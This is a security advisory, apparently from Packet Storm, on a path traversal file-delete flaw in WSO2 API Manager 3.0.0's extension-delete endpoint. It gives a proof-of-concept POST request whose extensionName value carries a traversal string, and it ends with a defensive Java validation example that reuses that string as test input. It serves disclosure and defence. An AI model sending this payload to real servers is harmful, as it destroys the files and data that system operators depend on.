WSO2 API Manager Carbon Interface 3.0.0 File Delete

13 Apr 2020 00:00:00. Reported by Raki Ben Hamouda. Type: packetstorm. Source: packetstormsecurity.com

WSO2 API Manager Carbon Interface 3.0.0 File Delete vulnerabilit

Code
`Document Title:  
===============  
WSO2 API Manager (Delete Extension) Arbitrary File Delete (Path Traversal)  
  
  
##CVE not assigned yet  
##Author : Raki Ben Hamouda  
##Security Update : https://apim.docs.wso2.com/en/latest/  
  
  
Common Vulnerability Scoring System:  
====================================  
8.5  
  
  
Affected Product(s):  
====================  
WSO2 API Manager Carbon Interface  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
High  
  
  
Technical Details & Description:  
================================  
A remote arbitrary file delete vulnerability has been discovered in the  
official WSO2 API Manager Carbon UI product.  
The vulnerability allows a remote attacker with low privileges to  
send authenticated application requests  
that delete arbitrary system files.  
  
The vulnerability is located in the  
`/carbon/extensions/deleteExtension-ajaxprocessor.jsp` module, in the  
`extensionName` parameter,  
which names the extension to delete. Remote attackers are able to delete  
arbitrary files, such as configuration files and database (.db) files,  
via authenticated POST requests whose "extensionName" value contains a  
crafted path traversal string.  
  
The security risk of the arbitrary delete vulnerability is estimated as  
High, with a CVSS (Common Vulnerability Scoring System) score of 8.5.  
Exploitation of the path traversal vulnerability requires a low-privilege  
web-application user account and no user interaction.  
Successful exploitation of the vulnerability results in loss of  
availability, integrity and confidentiality.  
  
===============================  
  
Error generated by the server in the log file when the file is not found  
(this brought it to my attention ...)  
  
[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension.  
org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\commons-dir  
at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.java:531) ~[axis2_1.6.1.wso2v38.jar:?]  
at org.apache.axis2.description.OutInAxisOperationClient.handleResponse(OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]  
at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisOperation.java:457) ~[axis2_1.6.1.wso2v38.jar:?]  
at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(OutInAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]  
at org.apache.axis2.client.OperationClient.execute(OperationClient.java:149) ~[axis2_1.6.1.wso2v38.jar:?]  
at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.removeExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.extensions.stub_4.7.13.jar:?]  
at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extensions.ui_4.7.13.jar:?]  
at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspService(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]  
at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [tomcat_9.0.22.wso2v1.jar:?]  
  
*Error displayed in Web browser with body request:  
  
<script type="text/javascript">  
CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");  
</script>  
  
  
  
=============================  
  
Request Method(s):  
[+] POST  
  
Vulnerable Module(s):  
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp  
  
Vulnerable Parameter(s):  
[+] extensionName  
  
  
Server version  
3.0.0  
  
  
Proof of Concept (PoC):  
=======================  
The security vulnerability can be exploited by remote attackers with a  
low-privileged web-application user account and with no user interaction.  
For security demonstration or to reproduce the vulnerability, follow the  
information and steps provided below.  
  
  
1. The attacker must have access to the Extension component (List, Add, Delete  
extensions).  
2. The attacker uploads any file with a .jar extension.  
3. The attacker intercepts the request that follows and modifies the parameter  
with a traversal string:  
  
--- PoC Session Logs [POST] ---  
  
POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1  
Host: localhost:9443  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0  
Accept: text/javascript, text/html, application/xml, text/xml, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest, XMLHttpRequest  
X-Prototype-Version: 1.5.0  
Content-type: application/x-www-form-urlencoded; charset=UTF-8  
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS  
Content-Length: 22  
Origin: https://localhost:9443  
Connection: close  
Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu  
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions  
Pragma: no-cache  
Cache-Control: no-cache  
  
extensionName=../../../../INSTALL.txt  
  
---------------Returned Headers in Response------------------  
  
HTTP/1.1 200  
X-Content-Type-Options: nosniff  
X-XSS-Protection: 1; mode=block  
X-Frame-Options: DENY  
Content-Type: text/html;charset=UTF-8  
Content-Length: 10  
Date: Sat, 04 Jan 2020 00:55:38 GMT  
Connection: close  
Server: WSO2 Carbon Server  
`
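
The server-side check whose absence the advisory describes, as an added example (this is not WSO2's code or its actual fix): the client-supplied `extensionName` is allow-listed, resolved against the extensions directory, and accepted only if the result is a direct child of that directory. The class and method names are hypothetical, the file-name allow-list is an assumption, and a temporary directory stands in for `repository\deployment\server\registryextensions`.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.LinkOption;
import java.nio.file.Path;

// Added example: hypothetical helper, not taken from the WSO2 code base.
public class SafeExtensionDelete {

    // Map a client-supplied name to a path that is a direct child of baseDir, or throw.
    static Path resolveExtension(Path baseDir, String extensionName) throws IOException {
        // Assumed allow-list: plain file names only, so '/', '\\', NUL, "." and ".." never pass.
        if (extensionName == null || !extensionName.matches("[A-Za-z0-9][A-Za-z0-9._-]*")) {
            // Generic message: do not echo the resolved server path back to the client.
            throw new IOException("Invalid extension name");
        }
        Path base = baseDir.toRealPath();                      // canonical form, symlinks resolved
        Path target = base.resolve(extensionName).normalize(); // collapses any "." or ".."
        if (!base.equals(target.getParent())) {                // defence in depth after the allow-list
            throw new IOException("Invalid extension name");
        }
        return target;
    }

    static boolean deleteExtension(Path baseDir, String extensionName) throws IOException {
        Path target = resolveExtension(baseDir, extensionName);
        // NOFOLLOW_LINKS: a symlink planted in the directory is not treated as an extension.
        if (!Files.isRegularFile(target, LinkOption.NOFOLLOW_LINKS)) {
            throw new IOException("No such extension");
        }
        return Files.deleteIfExists(target);
    }

    public static void main(String[] args) throws IOException {
        // Constructed sandbox: an extensions directory plus one file outside it.
        Path base = Files.createTempDirectory("registryextensions");
        Files.createFile(base.resolve("demo.jar"));
        Path outside = Files.createTempFile(base.getParent(), "INSTALL", ".txt");
        String[] names = {"demo.jar", "../../../../INSTALL.txt",
                          "../" + outside.getFileName(), "missing.jar"};
        for (String name : names) {
            try {
                System.out.println(name + " -> deleted=" + deleteExtension(base, name));
            } catch (IOException e) {
                System.out.println(name + " -> rejected: " + e.getMessage());
            }
        }
        System.out.println("file outside base still exists: " + Files.exists(outside));
    }
}
```

The rejection messages are deliberately generic, unlike the `File does not exist: E:\api-wso2\...` dialog quoted in the advisory, which returns the server's absolute install path to the client.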
